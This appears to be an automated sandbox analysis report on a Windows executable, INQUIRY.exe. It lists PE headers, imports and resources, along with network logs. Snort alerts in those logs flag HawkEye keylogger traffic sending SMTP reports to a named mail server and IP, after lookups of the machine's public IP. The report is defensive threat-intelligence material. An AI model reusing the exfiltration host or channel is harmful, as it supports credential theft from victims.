                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:5113dec31b8616dbad783836e7188783

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00479694h
                                                                      call 00007F14C893661Dh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C89863DDh
                                                                      mov ecx, dword ptr [00495BC8h]
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [00479188h]
                                                                      call 00007F14C89863DDh
                                                                      mov eax, dword ptr [00495AD0h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007F14C8986451h
                                                                      call 00007F14C8934114h
                                                                      lea eax, dword ptr [eax+00h]
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x97000          0x24c4        .idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa4000          0x57324       .rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9c000          0x7f70        .reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS             0x9b000          0x18          .rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
CODE    0x1000           0x788cc       0x78a00   False     0.524172198834   data       6.51448811653  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA    0x7a000          0x1bc5c       0x1be00   False     0.171568455717   data       2.71109267168  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS     0x96000          0xcb1         0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata  0x97000          0x24c4        0x2600    False     0.352076480263   data       4.94171972073  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls    0x9a000          0x10          0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata  0x9b000          0x18          0x200     False     0.048828125      data       0.20058190744  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc  0x9c000          0x7f70        0x8000    False     0.559631347656   data       6.62495186635  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0xa4000          0x57324       0x57400   False     0.922672479405   data       7.57976248647  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name             RVA      Size     Type                                                    Language  Country
RT_CURSOR        0xa4900  0x134    data
RT_CURSOR        0xa4a34  0x134    data
RT_CURSOR        0xa4b68  0x134    data
RT_CURSOR        0xa4c9c  0x134    data
RT_CURSOR        0xa4dd0  0x134    data
RT_CURSOR        0xa4f04  0x134    data
RT_CURSOR        0xa5038  0x134    data
RT_BITMAP        0xa516c  0x1d0    data
RT_BITMAP        0xa533c  0x1e4    data
RT_BITMAP        0xa5520  0x1d0    data
RT_BITMAP        0xa56f0  0x1d0    data
RT_BITMAP        0xa58c0  0x1d0    data
RT_BITMAP        0xa5a90  0x1d0    data
RT_BITMAP        0xa5c60  0x1d0    data
RT_BITMAP        0xa5e30  0x1d0    data
RT_BITMAP        0xa6000  0x539f1  data                                                    English   United States
RT_BITMAP        0xf99f4  0x1d0    data
RT_BITMAP        0xf9bc4  0xd8     data
RT_BITMAP        0xf9c9c  0xd8     data
RT_BITMAP        0xf9d74  0xd8     data
RT_BITMAP        0xf9e4c  0xd8     data
RT_BITMAP        0xf9f24  0xd8     data
RT_BITMAP        0xf9ffc  0xe8     GLS_BINARY_LSB_FIRST
RT_ICON          0xfa0e4  0x668    data                                                    English   United States
RT_DIALOG        0xfa74c  0x52     data
RT_RCDATA        0xfa7a0  0x10     data
RT_RCDATA        0xfa7b0  0x274    data
RT_RCDATA        0xfaa24  0x7c3    Delphi compiled form 'TForm1'
RT_GROUP_CURSOR  0xfb1e8  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xfb1fc  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xfb210  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xfb224  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xfb238  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xfb24c  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xfb260  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON    0xfb274  0x14     data                                                    English   United States
RT_HTML          0xfb288  0x99     data                                                    English   United States

Imports

DLL           Import
kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll    GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll  SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll  lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll   VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll     UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll    WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardType, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll  Sleep
oleaut32.dll  SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll  ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
kernel32.dll  MulDiv

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
11/18/20-15:02:26.704911  TCP       2019926  ET TROJAN HawkEye Keylogger Report SMTP  49750        587        192.168.2.4  166.62.27.57
11/18/20-15:03:08.289546  TCP       2019926  ET TROJAN HawkEye Keylogger Report SMTP  49774        587        192.168.2.4  166.62.27.57

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      Nov 18, 2020 15:03:21.561477900 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.577825069 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.578566074 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.578881979 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.579174995 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.580313921 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.596695900 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:29.440840960 CET4977680192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:03:33.825721025 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.842268944 CET8049783104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.842434883 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.843103886 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.859492064 CET8049783104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.867271900 CET8049783104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.919022083 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.922338009 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.935373068 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.935470104 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.994344950 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.010693073 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.011655092 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.011869907 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.012151957 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.014883041 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.017091990 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.031169891 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.033345938 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.033483028 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.034290075 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.050524950 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.051311970 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.051436901 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.051750898 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.053292036 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.069533110 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.063572884 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.705008984 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.721420050 CET8049790104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.721513033 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.721941948 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.738285065 CET8049790104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.753989935 CET8049790104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.792529106 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.799551964 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.808798075 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.808916092 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.814506054 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.830831051 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.831717014 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.831876993 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.831955910 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.833606958 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.834084988 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.849889994 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.850408077 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.850503922 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.850949049 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.867291927 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.867737055 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.867901087 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.867955923 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.868451118 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.884862900 CET44349792104.16.155.36192.168.2.4

                                                                      UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 18, 2020 15:01:58.704564095 CET | 192.168.2.4 | 8.8.8.8 | 0x7fd8 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:01:58.971637011 CET | 192.168.2.4 | 8.8.8.8 | 0x27c4 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:01:59.079847097 CET | 192.168.2.4 | 8.8.8.8 | 0x7cb6 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:23.770134926 CET | 192.168.2.4 | 8.8.8.8 | 0xb5a3 | Standard query (0) | mail.iigcest.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.128568888 CET | 192.168.2.4 | 8.8.8.8 | 0x8bd0 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:02:38.443804026 CET | 192.168.2.4 | 8.8.8.8 | 0x9673 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.556760073 CET | 192.168.2.4 | 8.8.8.8 | 0x19c | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:05.854183912 CET | 192.168.2.4 | 8.8.8.8 | 0x697a | Standard query (0) | mail.iigcest.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:20.956906080 CET | 192.168.2.4 | 8.8.8.8 | 0xa2aa | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:21.287211895 CET | 192.168.2.4 | 8.8.8.8 | 0x557a | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.386476994 CET | 192.168.2.4 | 8.8.8.8 | 0x5ae3 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.447617054 CET | 192.168.2.4 | 8.8.8.8 | 0x53b6 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:33.766551018 CET | 192.168.2.4 | 8.8.8.8 | 0x5dfb | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.881725073 CET | 192.168.2.4 | 8.8.8.8 | 0x5d23 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.602796078 CET | 192.168.2.4 | 8.8.8.8 | 0x70c7 | Standard query (0) | 121.205.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:04:00.673490047 CET | 192.168.2.4 | 8.8.8.8 | 0x279f | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.756617069 CET | 192.168.2.4 | 8.8.8.8 | 0x506 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 18, 2020 15:01:58.741070986 CET | 8.8.8.8 | 192.168.2.4 | 0x7fd8 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:01:59.006939888 CET | 8.8.8.8 | 192.168.2.4 | 0x27c4 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:01:59.006939888 CET | 8.8.8.8 | 192.168.2.4 | 0x27c4 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:01:59.106956959 CET | 8.8.8.8 | 192.168.2.4 | 0x7cb6 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:01:59.106956959 CET | 8.8.8.8 | 192.168.2.4 | 0x7cb6 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:23.815956116 CET | 8.8.8.8 | 192.168.2.4 | 0xb5a3 | No error (0) | mail.iigcest.com |  | 166.62.27.57 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.164376020 CET | 8.8.8.8 | 192.168.2.4 | 0x8bd0 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:02:38.471159935 CET | 8.8.8.8 | 192.168.2.4 | 0x9673 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.471159935 CET | 8.8.8.8 | 192.168.2.4 | 0x9673 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.592199087 CET | 8.8.8.8 | 192.168.2.4 | 0x19c | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:02:38.592199087 CET | 8.8.8.8 | 192.168.2.4 | 0x19c | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:05.904856920 CET | 8.8.8.8 | 192.168.2.4 | 0x697a | No error (0) | mail.iigcest.com |  | 166.62.27.57 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:20.992511988 CET | 8.8.8.8 | 192.168.2.4 | 0xa2aa | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:21.314351082 CET | 8.8.8.8 | 192.168.2.4 | 0x557a | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.314351082 CET | 8.8.8.8 | 192.168.2.4 | 0x557a | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.424304962 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae3 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:21.424304962 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae3 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.483230114 CET | 8.8.8.8 | 192.168.2.4 | 0x53b6 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:03:33.802285910 CET | 8.8.8.8 | 192.168.2.4 | 0x5dfb | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.802285910 CET | 8.8.8.8 | 192.168.2.4 | 0x5dfb | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.917220116 CET | 8.8.8.8 | 192.168.2.4 | 0x5d23 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:03:33.917220116 CET | 8.8.8.8 | 192.168.2.4 | 0x5d23 | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.638335943 CET | 8.8.8.8 | 192.168.2.4 | 0x70c7 | Name error (3) | 121.205.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Nov 18, 2020 15:04:00.700529099 CET | 8.8.8.8 | 192.168.2.4 | 0x279f | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.700529099 CET | 8.8.8.8 | 192.168.2.4 | 0x279f | No error (0) | whatismyipaddress.com |  | 104.16.154.36 | A (IP address) | IN (0x0001)
Nov 18, 2020 15:04:00.791821003 CET | 8.8.8.8 | 192.168.2.4 | 0x506 | No error (0) | whatismyipaddress.com |  | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.791821003 CET8.8.8.8192.168.2.40x506No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • whatismyipaddress.com

                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49743 | 104.16.154.36 | 80 | C:\Users\user\Desktop\INQUIRY.exe
Timestamp | kBytes transferred | Direction | Data
Nov 18, 2020 15:01:59.048484087 CET | 348 | OUT | GET / HTTP/1.1
Host: whatismyipaddress.com
Connection: Keep-Alive
Nov 18, 2020 15:01:59.071091890 CET | 349 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:01:59 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:01:59 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d42940f0000c2810dbe2000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423a0018cdc281-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


